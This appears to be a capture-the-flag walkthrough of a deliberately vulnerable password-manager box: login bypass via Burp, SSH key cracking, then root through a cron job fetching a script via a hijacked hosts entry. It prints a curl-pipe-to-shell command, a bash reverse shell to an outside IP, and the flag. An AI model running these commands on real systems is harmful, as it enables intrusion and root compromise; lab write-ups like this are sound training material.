Description

What happens when a group of broke Computer Science students try to make a password manager?

Obviously a perfect commercial success!

Enumeration

Nmap Scan

1

nmap -p- -T5 $IP

1
2
3
4
5
6

Nmap scan report for 10.10.88.227
Host is up (0.19s latency).
Not shown: 64807 closed tcp ports (conn-refused), 726 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http

Dirbuster Scan

Looks like there is a route to http://10.10.88.227/admin.html.

Inspecting the sources (login.js), we can see the vulnerable code block:

The if-else blocks only checks for “Incorrect Credentials” in the POST response, we could probably modify the response via Burpsuite to force a creation of a SessionToken cookie (or manually create 1 ourselves).

Burpsuite Intercept

Intercepting the traffic, we can get the Response to this request in the ui:

Forwarding the traffic, we can see the modified response

We can then try to refresh the page in Burpsuite’s Browser and find that we are logged in!

We can see that a SessionToken cookie is created in the browser

Looks like an SSH RSA Private Key. We might be able to use this to access the server?

SSH

Trying this:

1

ssh -i james@$IP

I get the following response:

Cracking the SSH key passphrase

I first used ssh2john to convert it to a key hash:

1

ssh2john james.key > james.key.hash

Removing the rsa.key: from the hash, and using hashcat to identify the id of the hash to crack:

I then use hashcat to crack the hash with the rockyou wordlist:

1

hashcat -m 22931 james.key.hash /usr/share/wordlists/rockyou.txt

Passphrase: james13

Login attempt

Using the same command, I tried to SSH into the machine with the key and passphrase:

We got the user flag:

1

thm{65c1aaf000506e56996822c6281e6bf7}

Privilege Escalation

Using Linpeas, we can find possible routes to privilige escalation. Following this tutorial, I started a webserver in the host machine and curl-ed the script in the victim machine:

1

curl $HOST-IP/linpeas.sh | sh

Crontab

Looks like the final line in the crontab runs as root, getting a bash script from a particular server and executing it

Hosts File

The hosts file seems to be writable by everyone. Looks like I could modify the overpass.thm in the hosts file to do a callback to the host machine to run a malicious callback script.

Escalation Process

We first created the necessary directories and buildscript.sh file:

1
2
3
4
5
6
7
8
9

mkdir downloads
mkdir downloads/src
vim downloads/src/buildscript.sh
# Create the file with this as content: 
# bash -i >& /dev/tcp/HOST-IP/5555 0>&1
# bash -i >& /dev/tcp/10.17.101.177/5555 0>&1

# Just in case (Probably don't have to do this)
chmod +x downloads/src/buildscript.sh

and also started 2 servers:

1
2
3
4
5
6
7
8

# Start the netcat listener
nc -lvnup 5555

# Python Http Server
# sudo python3 -m http.server 80

# Python2 Http Server
python2 -m SimpleHTTPServer 80

It doesn’t seem like the Python3 server works, so I used python2 with SimpleHTTPServer instead.. (More info later)

The script used was a bash reverse shell, folloing the tutorial here, I created the file with this as the content:

1
2
3

#!/bin/bash

bash -i >& /dev/tcp/10.17.101.177/5555 0>&1

In the Victim Machine, I modified the hosts file

1

10.17.101.177 overpass.thm

And then we wait.. The script will be executed after the request from crontab.

After a few seconds, we get a reverse shell running as root! We can get the root flag from the current directory:

We can see that we are root, the root.txt flag is in the directory and we can get the root flag!